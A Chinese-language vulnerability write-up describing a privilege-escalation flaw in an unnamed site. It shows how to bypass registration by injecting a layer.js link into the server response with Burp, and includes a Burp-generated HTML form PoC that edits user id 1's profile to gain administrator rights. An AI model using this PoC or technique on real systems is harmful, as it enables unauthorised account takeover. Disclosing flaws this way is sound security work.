漏洞过程:

  1. 注册用户(这里很奇葩,网站把没引入layer.js来限制用户注册,然后用burp抓取然后往返回包里添加http://res.layui.com/layui/release/layer/dist/layer.js?v=3111即可)
  2. 注册登录后存在越权漏洞,原理如下
    我是id2000的用户,然后我在修改资料的时候存在越权漏洞,抓包修改id1的账户也就是管理员的账户信息,然后程序就会自动认为我是管理员,然后给我赋值为管理员权限,如下是过程

复现过程

1、注册用户(这里是可以绕过的注册)

比如点击注册的时候是没反应的

image.png-87kB

f12测试,看出没有引入layer,然后我们去找到这个js链接

1
http://res.layui.com/layui/release/layer/dist/layer.js?v=3111

然后抓返回包添加进去

image.png-89.1kB

注册成功后登陆进去,访问如下poc即可,这个html页面是修改id1用户的性别为女性,即可达到管理员权限,原理解释过了。

1
<html>
2
  <!-- CSRF PoC - generated by Burp Suite Professional -->
3
  <body>
4
  <script>history.pushState('', '', '/')</script>
5
    <form action="http://不告诉你/system/user/profile/update" method="POST">
6
      <input type="hidden" name="userId" value="1" />
7
      <input type="hidden" name="sex" value="1" />
8
      <input type="submit" value="Submit request" />
9
    </form>
10
  </body>
11
</html>

然后就变成管理员了 =。=